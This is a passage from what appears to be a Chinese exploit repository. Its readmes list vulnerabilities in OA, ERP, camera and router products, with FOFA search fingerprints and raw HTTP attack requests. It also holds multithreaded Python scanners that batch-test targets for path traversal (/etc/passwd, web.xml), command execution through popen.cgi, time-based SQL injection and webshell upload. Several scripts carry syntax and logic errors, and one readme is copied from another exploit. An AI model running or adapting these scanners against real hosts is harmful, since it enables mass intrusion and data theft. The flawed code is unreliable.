f.readlines(): 102 | url = url.strip().replace("\n", "") 103 | if "https://" in url or "http://" in url: 104 | url = url 105 | else: 106 | host, port = extract_host(url) 107 | url = f"http://{host}:{port}" 108 | url_list.append(url) 109 | 110 | pool = Pool(10) 111 | pool.map(poc, url_list) 112 | pool.close() 113 | pool.join() 114 | 115 | else: 116 | parser.print_help() 117 | 118 | 119 | if __name__ == '__main__': 120 | main() 121 | -------------------------------------------------------------------------------- /20240112用友U8 CRM系统help2 任意文件读取漏洞/readme.md: -------------------------------------------------------------------------------- 1 | # 用友U8 CRM系统help2 任意文件读取漏洞 2 | 3 | 免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与作者无关。该文章仅供学习用途使用!!! 4 | 5 | 6 | 7 | FOFA:title="用友U8CRM" 8 | 9 | GET /pub/help2.php?key=/../../apache/php.ini HTTP/1.1 10 | 11 | Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0 Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 12 | 13 | Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 14 | 15 | Accept-Encoding: gzip, deflate 16 | 17 | DNT: 1 18 | 19 | Connection: close 20 | 21 | Upgrade-Insecure-Requests: 1 22 | 23 | 批量poc(记得安装库) 24 | 25 | python poc.py -u 26 | 27 | python poc.py -f .txt 28 | 29 | 结果保存至result.txt 30 | 31 | 入圈![image-20240108000010545](assets/image-20240108000010545.png) 32 | -------------------------------------------------------------------------------- /20240115金和OA C6 upload_json.asp存在任意文件上传漏洞/assets/image-20240108000010545.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/y1hub/poc_exp/2398dd76ffeb286912187a4cbcce23b868002ac7/20240115金和OA C6 upload_json.asp存在任意文件上传漏洞/assets/image-20240108000010545.png -------------------------------------------------------------------------------- /20240115金和OA C6 upload_json.asp存在任意文件上传漏洞/assets/image-20240115225358128.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/y1hub/poc_exp/2398dd76ffeb286912187a4cbcce23b868002ac7/20240115金和OA C6 upload_json.asp存在任意文件上传漏洞/assets/image-20240115225358128.png -------------------------------------------------------------------------------- /20240115金和OA C6 upload_json.asp存在任意文件上传漏洞/readme.md: -------------------------------------------------------------------------------- 1 | # 金和OA C6 upload_json.asp存在任意文件上传漏洞 2 | 3 | 免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与作者无关。该文章仅供学习用途使用!!! 4 | 5 | FOFA指纹:app="金和网络-金和OA" 6 | 7 | 批量poc(记得安装库) 8 | 9 | python poc.py -u 10 | 11 | python poc.py -f .txt 12 | 13 | 结果保存至result.txt 14 | 15 | 利用替换文件内容上传shelll 16 | 17 | ![image-20240115225358128](assets/image-20240115225358128.png) 18 | 19 | 20 | 21 | 入圈![image-20240108000010545](assets/image-20240108000010545.png) 22 | -------------------------------------------------------------------------------- /20240118某擎rptsvr 任意文件上传/assets/image-20240118193841950.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/y1hub/poc_exp/2398dd76ffeb286912187a4cbcce23b868002ac7/20240118某擎rptsvr 任意文件上传/assets/image-20240118193841950.png -------------------------------------------------------------------------------- /20240118某擎rptsvr 任意文件上传/assets/image-20240118194414299.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/y1hub/poc_exp/2398dd76ffeb286912187a4cbcce23b868002ac7/20240118某擎rptsvr 任意文件上传/assets/image-20240118194414299.png -------------------------------------------------------------------------------- /20240118某擎rptsvr 任意文件上传/readme.md: -------------------------------------------------------------------------------- 1 | # 奇安信 天擎 rptsvr 任意文件上传 2 | 3 | 免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与作者无关。该文章仅供学习用途使用!!! 4 | 5 | fofa:banner="QiAnXin web server" 6 | 7 | 批量poc(记得安装库) 8 | 9 | python poc.py -u 10 | 11 | python poc.py -f .txt 12 | 13 | 结果保存至result.txt 14 | 15 | 利用替换文件内容上传shelll 16 | 17 | ![image-20240118193841950](assets/image-20240118193841950.png) 18 | 19 | 入圈![image-20240118194414299](assets/image-20240118194414299.png) 20 | -------------------------------------------------------------------------------- /20240121cellinx 摄像机 uac.cgi 未授权添加用户漏洞EXP/assets/image-20240121123506173.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/y1hub/poc_exp/2398dd76ffeb286912187a4cbcce23b868002ac7/20240121cellinx 摄像机 uac.cgi 未授权添加用户漏洞EXP/assets/image-20240121123506173.png -------------------------------------------------------------------------------- /20240121cellinx 摄像机 uac.cgi 未授权添加用户漏洞EXP/assets/image-20240121123615474.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/y1hub/poc_exp/2398dd76ffeb286912187a4cbcce23b868002ac7/20240121cellinx 摄像机 uac.cgi 未授权添加用户漏洞EXP/assets/image-20240121123615474.png -------------------------------------------------------------------------------- /20240121cellinx 摄像机 uac.cgi 未授权添加用户漏洞EXP/assets/image-20240121123620660.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/y1hub/poc_exp/2398dd76ffeb286912187a4cbcce23b868002ac7/20240121cellinx 摄像机 uac.cgi 未授权添加用户漏洞EXP/assets/image-20240121123620660.png -------------------------------------------------------------------------------- /20240121cellinx 摄像机 uac.cgi 未授权添加用户漏洞EXP/readme.md: -------------------------------------------------------------------------------- 1 | # cellinx 摄像机 uac.cgi 未授权添加用户漏洞EXP 2 | 3 | 免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与作者无关。该文章仅供学习用途使用!!! 4 | 5 | fofa: body="local/NVT-string.js" 6 | 7 | 批量poc(记得安装库) 8 | 9 | python poc.py -u 10 | 11 | python poc.py -f .txt 12 | 13 | 结果保存至result.txt 14 | 15 | 修改账号密码![image-20240121123506173](assets/image-20240121123506173.png) 16 | 17 | 入圈(限时体验) 18 | 19 | ![image-20240121123620660](assets/image-20240121123620660.png)s 20 | 21 | ![image-20240121123615474](assets/image-20240121123615474.png) 22 | -------------------------------------------------------------------------------- /20240122Hytec Inter HWL 2511 SS路由器命令执行漏洞/assets/image-20240121123620660.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/y1hub/poc_exp/2398dd76ffeb286912187a4cbcce23b868002ac7/20240122Hytec Inter HWL 2511 SS路由器命令执行漏洞/assets/image-20240121123620660.png -------------------------------------------------------------------------------- /20240122Hytec Inter HWL 2511 SS路由器命令执行漏洞/assets/image-20240122222409091.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/y1hub/poc_exp/2398dd76ffeb286912187a4cbcce23b868002ac7/20240122Hytec Inter HWL 2511 SS路由器命令执行漏洞/assets/image-20240122222409091.png -------------------------------------------------------------------------------- /20240122Hytec Inter HWL 2511 SS路由器命令执行漏洞/poc.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | import argparse 3 | import base64 4 | import re 5 | import sys 6 | from multiprocessing.dummy import Pool 7 | 8 | import requests 9 | import urllib3 10 | from rich.console import Console 11 | 12 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) 13 | 14 | 15 | def banner(): 16 | test = """ 17 | 8b d8 88 88 a8P 88 888b 88 ,ad8888ba, 18 | Y8, ,8P ,d88 88 ,88' ,d88 8888b 88 d8"' `"8b 19 | Y8, ,8P 888888 88 ,88" 888888 88 `8b 88 d8' 20 | "8aa8" 88 88,d88' 88 88 `8b 88 88 21 | `88' 88 8888"88, 88 88 `8b 88 88 88888 22 | 88 88 88P Y8b 88 88 `8b 88 Y8, 88 23 | 88 88 88 "88, 88 88 `888 `"Y88888P" 24 | 25 | 888888888888 26 | 27 | tag: this is a Hytec Inter HWL 2511 SS 路由器 命令执行漏洞 28 | @version: 1.0.0 @author: Y1_K1NG 29 | """ 30 | print(test) 31 | 32 | 33 | def poc(target): 34 | if target[-1] == '/': 35 | target = target[:-1] 36 | else: 37 | target = target 38 | url = target + "/cgi-bin/popen.cgi?command=whoami" 39 | 40 | headers = { 41 | "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0", 42 | "Accept-Encoding": "gzip, deflate", 43 | "Upgrade-Insecure-Requests": "1", 44 | "TContent-Length": "35", 45 | "Te": "trailers", 46 | "Connection": "close" 47 | } 48 | 49 | 50 | 51 | try: 52 | response1 = requests.get(url, headers=headers, verify=False, timeout=15) 53 | # print(response.request.headers) 54 | # print(response.request.body) 55 | # print(response.text) 56 | 57 | if response1.status_code = "200": 58 | if "sh:" or "s h :" or "eth0" or "e t h 0" in response1.text : 59 | print(f"[++++++] {target} 存在 命令执行漏洞") 60 | with open("result.txt", "a+", encoding="utf-8") as f: 61 | f.write(url_result + "\n") 62 | else: 63 | print(f"[++++++] {target} 存在 命令执行漏洞,但有点小问题,可能这个命令给你屏蔽了") 64 | else: 65 | print(f"[-] {target} 不存在 命令执行漏洞") 66 | except Exception as e: 67 | print(f"[*] {target} error: {str(e)}") 68 | 69 | 70 | def extract_host(url): 71 | """ 72 | 从 URL 中提取主机地址和端口号,返回 (host, port) 73 | """ 74 | match = re.search(r"(http://|https://)?([\w\.]+):?(\d+)?", url) 75 | if match: 76 | prefix, host, port = match.groups() 77 | if not port: 78 | if prefix and "https" in prefix: 79 | port = "443" 80 | else: 81 | port = "80" 82 | return host, int(port) 83 | else: 84 | return None, None 85 | 86 | 87 | def main(): 88 | banner() 89 | parser = argparse.ArgumentParser(description='任何问题+V y1k1ng1227') 90 | parser.add_argument("-u", "--url", dest="url", type=str, help=" example: http://www.example.com") 91 | parser.add_argument("-f", "--file", dest="file", type=str, help=" urls.txt") 92 | args = parser.parse_args() 93 | 94 | if args.url and not args.file: 95 | if "https://" in args.url or "http://" in args.url: 96 | url = args.url 97 | else: 98 | host, port = extract_host(args.url) 99 | url = f"http://{host}:{port}" 100 | poc(url) 101 | 102 | elif args.url is None and args.file is not None: 103 | url_list = [] 104 | with open(args.file, "r", encoding="utf-8") as f: 105 | for url in f.readlines(): 106 | url = url.strip().replace("\n", "") 107 | if "https://" in url or "http://" in url: 108 | url = url 109 | else: 110 | host, port = extract_host(url) 111 | url = f"http://{host}:{port}" 112 | url_list.append(url) 113 | 114 | pool = Pool(10) 115 | pool.map(poc, url_list) 116 | pool.close() 117 | pool.join() 118 | 119 | else: 120 | parser.print_help() 121 | 122 | 123 | if __name__ == '__main__': 124 | main() 125 | -------------------------------------------------------------------------------- /20240122Hytec Inter HWL 2511 SS路由器命令执行漏洞/readme.md: -------------------------------------------------------------------------------- 1 | # cellinx 摄像机 uac.cgi 未授权添加用户漏洞EXP 2 | 3 | 免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与作者无关。该文章仅供学习用途使用!!! 4 | 5 | fofa: body="local/NVT-string.js" 6 | 7 | 批量poc(记得安装库) 8 | 9 | python poc.py -u 10 | 11 | python poc.py -f .txt 12 | 13 | 结果保存至result.txt 14 | 15 | 16 | 17 | ## 入圈(限时体验) 18 | 19 | ![image-20240122222409091](assets/image-20240122222409091.png) 20 | 21 | ![image-20240121123620660](assets/image-20240121123620660.png)s 22 | 23 | -------------------------------------------------------------------------------- /20240126Laykefu客服系统 任意文件上传漏洞/assets/image-20240121123620660.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/y1hub/poc_exp/2398dd76ffeb286912187a4cbcce23b868002ac7/20240126Laykefu客服系统 任意文件上传漏洞/assets/image-20240121123620660.png -------------------------------------------------------------------------------- /20240126Laykefu客服系统 任意文件上传漏洞/assets/image-20240126001223257.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/y1hub/poc_exp/2398dd76ffeb286912187a4cbcce23b868002ac7/20240126Laykefu客服系统 任意文件上传漏洞/assets/image-20240126001223257.png -------------------------------------------------------------------------------- /20240126Laykefu客服系统 任意文件上传漏洞/readme.md: -------------------------------------------------------------------------------- 1 | # Laykefu客服系统 任意文件上传漏洞 2 | 3 | 免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与作者无关。该文章仅供学习用途使用!!! 4 | 5 | icon_hash="-334624619" 6 | 7 | 批量poc(记得安装库) 8 | 9 | python poc.py -u 10 | 11 | python poc.py -f .txt 12 | 13 | 结果保存至result.txt 14 | 15 | 16 | 17 | ## 入圈(限时体验) 18 | 19 | ![image-20240126001223257](assets/image-20240126001223257.png) 20 | 21 | ![image-20240121123620660](assets/image-20240121123620660.png)s 22 | 23 | -------------------------------------------------------------------------------- /20240127万户OA text2Html 任意文件读取/assets/image-20240121123620660.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/y1hub/poc_exp/2398dd76ffeb286912187a4cbcce23b868002ac7/20240127万户OA text2Html 任意文件读取/assets/image-20240121123620660.png -------------------------------------------------------------------------------- /20240127万户OA text2Html 任意文件读取/assets/image-20240127122138808.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/y1hub/poc_exp/2398dd76ffeb286912187a4cbcce23b868002ac7/20240127万户OA text2Html 任意文件读取/assets/image-20240127122138808.png -------------------------------------------------------------------------------- /20240127万户OA text2Html 任意文件读取/poc.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | import argparse 3 | import base64 4 | import re 5 | import sys 6 | import json 7 | from multiprocessing.dummy import Pool 8 | 9 | import requests 10 | import urllib3 11 | from rich.console import Console 12 | 13 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) 14 | 15 | 16 | def banner(): 17 | test = """ 18 | 8b d8 88 88 a8P 88 888b 88 ,ad8888ba, 19 | Y8, ,8P ,d88 88 ,88' ,d88 8888b 88 d8"' `"8b 20 | Y8, ,8P 888888 88 ,88" 888888 88 `8b 88 d8' 21 | "8aa8" 88 88,d88' 88 88 `8b 88 88 22 | `88' 88 8888"88, 88 88 `8b 88 88 88888 23 | 88 88 88P Y8b 88 88 `8b 88 Y8, 88 24 | 88 88 88 "88, 88 88 `888 `"Y88888P" 25 | 26 | 888888888888 27 | 28 | tag: this is a 万户OA text2Html 任意文件读取 29 | @version: 1.0.0 @author: Y1_K1NG 30 | """ 31 | print(test) 32 | 33 | 34 | def poc(target): 35 | if target[-1] == '/': 36 | target = target[:-1] 37 | else: 38 | target = target 39 | url = target + "/defaultroot/convertFile/text2Html.controller" 40 | 41 | headers = { 42 | "User-Agent": "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", 43 | "Connection": "close", 44 | "Content-Length": "63", 45 | "Accept-Encoding": "gzip, deflate, br", 46 | "Content-Type": "application/x-www-form-urlencoded", 47 | "SL-CE-SUID": "1081" 48 | } 49 | data = { 50 | "saveFileName": "123456/../../../../WEB-INF/web.xml", 51 | "moduleName": "html" 52 | } 53 | 54 | try: 55 | response1 = requests.post(url, headers=headers, data=data,verify=False, timeout=15) 56 | # print(response1.text) 57 | if response1.status_code = "200" and len(response1.text) > 10000: 58 | print(f"[++++++] {target} 存在 任意文件读取") 59 | with open("result.txt", "a+", encoding="utf-8") as f: 60 | f.write(target + "\n") 61 | 62 | else: 63 | print(f"[-] {target} 请求error") 64 | except Exception as e: 65 | print(f"[*] {target} error: {str(e)}") 66 | 67 | 68 | def extract_host(url): 69 | """ 70 | 从 URL 中提取主机地址和端口号,返回 (host, port) 71 | """ 72 | match = re.search(r"(http://|https://)?([\w\.]+):?(\d+)?", url) 73 | if match: 74 | prefix, host, port = match.groups() 75 | if not port: 76 | if prefix and "https" in prefix: 77 | port = "443" 78 | else: 79 | port = "80" 80 | return host, int(port) 81 | else: 82 | return None, None 83 | 84 | 85 | def main(): 86 | banner() 87 | parser = argparse.ArgumentParser(description='任何问题+V y1k1ng1227') 88 | parser.add_argument("-u", "--url", dest="url", type=str, help=" example: http://www.example.com") 89 | parser.add_argument("-f", "--file", dest="file", type=str, help=" urls.txt") 90 | args = parser.parse_args() 91 | 92 | if args.url and not args.file: 93 | if "https://" in args.url or "http://" in args.url: 94 | url = args.url 95 | else: 96 | host, port = extract_host(args.url) 97 | url = f"http://{host}:{port}" 98 | poc(url) 99 | 100 | elif args.url is None and args.file is not None: 101 | url_list = [] 102 | with open(args.file, "r", encoding="utf-8") as f: 103 | for url in f.readlines(): 104 | url = url.strip().replace("\n", "") 105 | if "https://" in url or "http://" in url: 106 | url = url 107 | else: 108 | host, port = extract_host(url) 109 | url = f"http://{host}:{port}" 110 | url_list.append(url) 111 | 112 | pool = Pool(10) 113 | pool.map(poc, url_list) 114 | pool.close() 115 | pool.join() 116 | 117 | else: 118 | parser.print_help() 119 | 120 | 121 | if __name__ == '__main__': 122 | main() 123 | -------------------------------------------------------------------------------- /20240127万户OA text2Html 任意文件读取/readme.md: -------------------------------------------------------------------------------- 1 | # 万户OA text2Html 任意文件读取 2 | 3 | 免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与作者无关。该文章仅供学习用途使用!!! 4 | 5 | fofa:app="万户网络-ezOFFICE" 6 | 7 | 批量poc(记得安装库) 8 | 9 | python poc.py -u 10 | 11 | python poc.py -f .txt 12 | 13 | 结果保存至result.txt 14 | 15 | 16 | 17 | ## 入圈(限时体验) 18 | 19 | ![image-20240127122138808](assets/image-20240127122138808.png) 20 | 21 | ![image-20240121123620660](assets/image-20240121123620660.png)s 22 | 23 | -------------------------------------------------------------------------------- /20240128Aria2 WebUI文件读取/assets/image-20240121123620660.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/y1hub/poc_exp/2398dd76ffeb286912187a4cbcce23b868002ac7/20240128Aria2 WebUI文件读取/assets/image-20240121123620660.png -------------------------------------------------------------------------------- /20240128Aria2 WebUI文件读取/assets/image-20240127122138808.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/y1hub/poc_exp/2398dd76ffeb286912187a4cbcce23b868002ac7/20240128Aria2 WebUI文件读取/assets/image-20240127122138808.png -------------------------------------------------------------------------------- /20240128Aria2 WebUI文件读取/poc.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | import argparse 3 | import base64 4 | import re 5 | import sys 6 | import json 7 | from multiprocessing.dummy import Pool 8 | 9 | import requests 10 | import urllib3 11 | from rich.console import Console 12 | 13 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) 14 | 15 | 16 | def banner(): 17 | test = """ 18 | 8b d8 88 88 a8P 88 888b 88 ,ad8888ba, 19 | Y8, ,8P ,d88 88 ,88' ,d88 8888b 88 d8"' `"8b 20 | Y8, ,8P 888888 88 ,88" 888888 88 `8b 88 d8' 21 | "8aa8" 88 88,d88' 88 88 `8b 88 88 22 | `88' 88 8888"88, 88 88 `8b 88 88 88888 23 | 88 88 88P Y8b 88 88 `8b 88 Y8, 88 24 | 88 88 88 "88, 88 88 `888 `"Y88888P" 25 | 26 | 888888888888 27 | 28 | tag: this is a Aria2 WebUI文件读取 29 | @version: 1.0.0 @author: Y1_K1NG 30 | """ 31 | print(test) 32 | 33 | 34 | def poc(target): 35 | if target[-1] == '/': 36 | target = target[:-1] 37 | else: 38 | target = target 39 | url = target + "/../../../../etc/passwd" 40 | 41 | headers = { 42 | "User-Agent": "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", 43 | "Accept-Encoding": "gzip, deflate", 44 | "Connection": "close", 45 | "Accept-Language": "zh-CN,zh;q=0.9,en;q=0.8" 46 | 47 | } 48 | 49 | 50 | try: 51 | response1 = requests.get(url, headers=headers, verify=False, timeout=15) 52 | # print(response1.text) 53 | if response1.status_code = "200" and "root" in response1.text: 54 | print(f"[++++++] {target} 存在 任意文件读取") 55 | with open("result.txt", "a+", encoding="utf-8") as f: 56 | f.write(target + "\n") 57 | 58 | else: 59 | print(f"[-] {target} 请求error") 60 | except Exception as e: 61 | print(f"[*] {target} error: {str(e)}") 62 | 63 | 64 | def extract_host(url): 65 | """ 66 | 从 URL 中提取主机地址和端口号,返回 (host, port) 67 | """ 68 | match = re.search(r"(http://|https://)?([\w\.]+):?(\d+)?", url) 69 | if match: 70 | prefix, host, port = match.groups() 71 | if not port: 72 | if prefix and "https" in prefix: 73 | port = "443" 74 | else: 75 | port = "80" 76 | return host, int(port) 77 | else: 78 | return None, None 79 | 80 | 81 | def main(): 82 | banner() 83 | parser = argparse.ArgumentParser(description='任何问题+V y1k1ng1227') 84 | parser.add_argument("-u", "--url", dest="url", type=str, help=" example: http://www.example.com") 85 | parser.add_argument("-f", "--file", dest="file", type=str, help=" urls.txt") 86 | args = parser.parse_args() 87 | 88 | if args.url and not args.file: 89 | if "https://" in args.url or "http://" in args.url: 90 | url = args.url 91 | else: 92 | host, port = extract_host(args.url) 93 | url = f"http://{host}:{port}" 94 | poc(url) 95 | 96 | elif args.url is None and args.file is not None: 97 | url_list = [] 98 | with open(args.file, "r", encoding="utf-8") as f: 99 | for url in f.readlines(): 100 | url = url.strip().replace("\n", "") 101 | if "https://" in url or "http://" in url: 102 | url = url 103 | else: 104 | host, port = extract_host(url) 105 | url = f"http://{host}:{port}" 106 | url_list.append(url) 107 | 108 | pool = Pool(10) 109 | pool.map(poc, url_list) 110 | pool.close() 111 | pool.join() 112 | 113 | else: 114 | parser.print_help() 115 | 116 | 117 | if __name__ == '__main__': 118 | main() 119 | -------------------------------------------------------------------------------- /20240128Aria2 WebUI文件读取/readme.md: -------------------------------------------------------------------------------- 1 | # Aria2 WebUI文件读取 2 | 3 | 免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与作者无关。该文章仅供学习用途使用!!! 4 | 5 | GET /../../../../etc/passwd HTTP/1.1 6 | Host: 7 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 8 | Accept-Encoding: gzip, deflate 9 | Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 10 | Connection: close 11 | 12 | 批量poc(记得安装库) 13 | 14 | python poc.py -u 15 | 16 | python poc.py -f .txt 17 | 18 | 结果保存至result.txt 19 | 20 | 21 | 22 | ## 入圈(限时体验) 23 | 24 | ![image-20240127122138808](assets/image-20240127122138808.png) 25 | 26 | ![image-20240121123620660](assets/image-20240121123620660.png)s 27 | 28 | -------------------------------------------------------------------------------- /20240129宏景EHR view接口sql注入漏洞/assets/image-20240121123620660.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/y1hub/poc_exp/2398dd76ffeb286912187a4cbcce23b868002ac7/20240129宏景EHR view接口sql注入漏洞/assets/image-20240121123620660.png -------------------------------------------------------------------------------- /20240129宏景EHR view接口sql注入漏洞/assets/image-20240127122138808.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/y1hub/poc_exp/2398dd76ffeb286912187a4cbcce23b868002ac7/20240129宏景EHR view接口sql注入漏洞/assets/image-20240127122138808.png -------------------------------------------------------------------------------- /20240129宏景EHR view接口sql注入漏洞/poc.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | import argparse 3 | import base64 4 | import re 5 | import sys 6 | import json 7 | from multiprocessing.dummy import Pool 8 | 9 | import requests 10 | import urllib3 11 | from rich.console import Console 12 | 13 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) 14 | 15 | 16 | def banner(): 17 | test = """ 18 | 8b d8 88 88 a8P 88 888b 88 ,ad8888ba, 19 | Y8, ,8P ,d88 88 ,88' ,d88 8888b 88 d8"' `"8b 20 | Y8, ,8P 888888 88 ,88" 888888 88 `8b 88 d8' 21 | "8aa8" 88 88,d88' 88 88 `8b 88 88 22 | `88' 88 8888"88, 88 88 `8b 88 88 88888 23 | 88 88 88P Y8b 88 88 `8b 88 Y8, 88 24 | 88 88 88 "88, 88 88 `888 `"Y88888P" 25 | 26 | 888888888888 27 | 28 | tag: this is a 宏景EHR view接口sql注入漏洞POC 29 | @version: 1.0.0 @author: Y1_K1NG 30 | """ 31 | print(test) 32 | 33 | 34 | def poc(target): 35 | if target[-1] == '/': 36 | target = target[:-1] 37 | else: 38 | target = target 39 | url = target + "/templates/attestation/../../general/info/view" 40 | 41 | headers = { 42 | "User-Agent": "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", 43 | "Content-Type": "application/x-www-form-urlencoded" 44 | 45 | } 46 | data = { 47 | "kind": "1", 48 | "a0100": "11';WAITFOR DELAY '0:0:5'--" 49 | } 50 | 51 | 52 | try: 53 | response1 = requests.post(url, data=data, headers=headers, verify=False, timeout=15) 54 | # print(response1.text) 55 | response1_time = response1.elapsed.total_seconds() 56 | if response1.status_code == "200" and response1_time > 4: 57 | print(f"[++++++] {target} 存在 任意文件读取") 58 | with open("result.txt", "a+", encoding="utf-8") as f: 59 | f.write(target + "\n") 60 | 61 | else: 62 | print(f"[-] {target} 不存在") 63 | except Exception as e: 64 | print(f"[*] {target} error: {str(e)}") 65 | 66 | 67 | def extract_host(url): 68 | """ 69 | 从 URL 中提取主机地址和端口号,返回 (host, port) 70 | """ 71 | match = re.search(r"(http://|https://)?([\w\.]+):?(\d+)?", url) 72 | if match: 73 | prefix, host, port = match.groups() 74 | if not port: 75 | if prefix and "https" in prefix: 76 | port = "443" 77 | else: 78 | port = "80" 79 | return host, int(port) 80 | else: 81 | return None, None 82 | 83 | 84 | def main(): 85 | banner() 86 | parser = argparse.ArgumentParser(description='任何问题+V y1k1ng1227') 87 | parser.add_argument("-u", "--url", dest="url", type=str, help=" example: http://www.example.com") 88 | parser.add_argument("-f", "--file", dest="file", type=str, help=" urls.txt") 89 | args = parser.parse_args() 90 | 91 | if args.url and not args.file: 92 | if "https://" in args.url or "http://" in args.url: 93 | url = args.url 94 | else: 95 | host, port = extract_host(args.url) 96 | url = f"http://{host}:{port}" 97 | poc(url) 98 | 99 | elif args.url is None and args.file is not None: 100 | url_list = [] 101 | with open(args.file, "r", encoding="utf-8") as f: 102 | for url in f.readlines(): 103 | url = url.strip().replace("\n", "") 104 | if "https://" in url or "http://" in url: 105 | url = url 106 | else: 107 | host, port = extract_host(url) 108 | url = f"http://{host}:{port}" 109 | url_list.append(url) 110 | 111 | pool = Pool(10) 112 | pool.map(poc, url_list) 113 | pool.close() 114 | pool.join() 115 | 116 | else: 117 | parser.print_help() 118 | 119 | 120 | if __name__ == '__main__': 121 | main() 122 | -------------------------------------------------------------------------------- /20240129宏景EHR view接口sql注入漏洞/readme.md: -------------------------------------------------------------------------------- 1 | # 宏景EHR view接口sql注入漏洞POC 2 | 3 | 免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与作者无关。该文章仅供学习用途使用!!! 4 | 5 | fofa:app="HJSOFT-HCM" 6 | 7 | 8 | POST /templates/attestation/../../general/info/view HTTP/1.1 9 | Host: xxxx 10 | Content-Type: application/x-www-form-urlencoded 11 | 12 | kind=1&a0100=11';WAITFOR+DELAY+'0:0:5'-- 13 | 14 | 批量poc(记得安装库) 15 | 16 | python poc.py -u 17 | 18 | python poc.py -f .txt 19 | 20 | 结果保存至result.txt 21 | 22 | 23 | 24 | ## 入圈(限时体验) 25 | 26 | ![image-20240127122138808](assets/image-20240127122138808.png) 27 | 28 | ![image-20240121123620660](assets/image-20240121123620660.png)s 29 | 30 | -------------------------------------------------------------------------------- /20240201用友系统-U9企业版存在任意文件上传漏洞/assets/image-20240121123620660.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/y1hub/poc_exp/2398dd76ffeb286912187a4cbcce23b868002ac7/20240201用友系统-U9企业版存在任意文件上传漏洞/assets/image-20240121123620660.png -------------------------------------------------------------------------------- /20240201用友系统-U9企业版存在任意文件上传漏洞/assets/image-20240127122138808.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/y1hub/poc_exp/2398dd76ffeb286912187a4cbcce23b868002ac7/20240201用友系统-U9企业版存在任意文件上传漏洞/assets/image-20240127122138808.png -------------------------------------------------------------------------------- /20240201用友系统-U9企业版存在任意文件上传漏洞/readme.md: -------------------------------------------------------------------------------- 1 | # 用友系统-U9企业版存在任意文件上传漏洞 2 | 3 | 免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与作者无关。该文章仅供学习用途使用!!! 4 | 5 | fofa:title="U9-登录" 6 | 7 | 8 | 9 | 批量poc(记得安装库) 10 | 11 | python poc.py -u 12 | 13 | python poc.py -f .txt 14 | 15 | 结果保存至result.txt 16 | 17 | 18 | 19 | ## 入圈(限时体验) 20 | 21 | ![image-20240127122138808](assets/image-20240127122138808.png) 22 | 23 | ![image-20240121123620660](assets/image-20240121123620660.png)s 24 | 25 | -------------------------------------------------------------------------------- /20240202万户OA-senddocument_import.jsp任意文件上传漏洞-1/assets/image-20240121123620660.png: 